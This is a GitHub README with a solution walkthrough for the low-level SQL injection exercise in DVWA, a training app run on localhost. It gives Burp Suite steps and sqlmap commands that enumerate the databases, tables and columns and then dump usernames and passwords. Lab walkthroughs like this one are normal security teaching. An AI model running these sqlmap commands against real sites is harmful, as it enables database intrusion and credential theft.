Skip to content

SharpHack/DVWA-Solution

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 

Repository files navigation

DVWA-Solution

DVWA vulnerable web application solutions

SQL Injection - Security Level (LOW)

http://localhost/DVWA/vulnerabilities/sqli/

Screenshot from 2019-10-04 09-31-39

  1. Enter 1 in the text field and intercept the request with the Burpsuite.

Screenshot from 2019-10-04 09-38-59

  1. Save the request to a sql.txt file

  2. Open terminal and type following query

     - sqlmap -r sql.txt --dbs 
    
    • above query will return Databases names present on the sql server
  3. Database name found - dvwadb (note: in user case maybe dvwa)

     - sqlmap -r sql.txt -D dvwadb --tables
    
    • above query will return Tables in the Database selected
  4. Tables found - Users and test

  5. Now enumerate for Columns

     - sqlmap -r sql.txt -D dvwadb -T users --columns
    
    • by enumerating columns we see username, password which looks intersesting

      • sqlmap -r sql.txt -D dvwadb -T users -C username,password --dump
    • this will dump all the username and password rows

For further enumeration common dictonary based hashes crack use sqlmap further.( Have Fun ;) )

About

DVWA vulnerable web application solutions

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published